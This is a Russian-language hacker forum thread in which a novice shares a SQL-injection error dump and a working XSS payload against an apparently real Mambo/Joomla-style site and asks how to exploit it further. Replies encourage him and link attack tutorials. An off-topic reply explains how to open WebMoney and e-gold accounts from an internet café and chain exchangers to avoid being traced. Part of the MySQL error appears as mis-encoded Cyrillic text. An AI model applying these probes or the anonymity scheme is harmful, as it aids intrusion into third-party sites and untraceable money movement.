нид хелп
 

Такс нашел вот что:
index.php?option=content&task=view&pass=6&Itemid=-1

Выдает значит:
MA DB function failed with error number 1064
х ЧБУ ПЫЙВЛБ Ч ЪБРТПУЕ. йЪХЮЙФЕ ДПЛХНЕОФБГЙА РП ЙУРПМШЪХЕНПК ЧЕТУЙЙ MySQL ОБ РТЕДНЕФ ЛПТТЕЛФОПЗП УЙОФБЛУЙУБ ПЛПМП '(); ' OR mm.menuid = '0') ORDER BY ordering' ОБ УФТПЛЕ 5 SQL=SELECT id, title, module, position, content, showtitle, params FROM mos_modules AS m, mos_modules_menu AS mm WHERE m.published='1' AND m.access <= '0' AND m.position='user2' AND mm.moduleid=m.id AND (mm.menuid = '-1'' OR mm.menuid = '0') ORDER BY ordering
SQL =
SELECT id, title, module, position, content, showtitle, params
FROM mos_modules AS m, mos_modules_menu AS mm
WHERE m.published='1' AND m.access <= '0' AND m.position='user2'
AND mm.moduleid=m.id
AND (mm.menuid = '-1'' OR mm.menuid = '0')
ORDER BY ordering


Вот решил проверить на выполнение скрипта:
index.php?option=content&task=view&pass=6&Itemid=-1'<script>alert();%20</script>
Работает....

Киньте плиз, либо линк, либо подскажите что дальше делать. Все расписывать не обязательно, буду сам дуплить по чуть чуть...

З.Ы. Да я в Этом пока ламер, но учиться ведь надо?
З.Ы.Ы Поис юзал, особо ответа на вопрос нету

1-й шаг2-й шагА мне всегда казалось,что это скуль... :)
Читай это:
_http://forum.antichat.ru/thread19605.html и всё похожее.
Первый раз такое вижу. Парень Молодец!!!

сделал xss через скуль-inj.. +)

про sql можеш почитать еще тут
про xss сюда

первый раз видишь что?

Спасибо.

О результатах отпишусь обязательно!

офф топ но всетаки...Где можно узнать инфу по анонимным переводам (типо w-money). Дабы безопасность максимальная была?

дбы была максимальная безопасность--- заходишь в захудалую инет кофешку регишь с ихнего компа пару аков web-maney и е голд ---- перекидываешь на еголд а потом на веб мани --- (на еголд через обменник) -- конешно трохан потеряешь при переводе но зато фиг кто докапается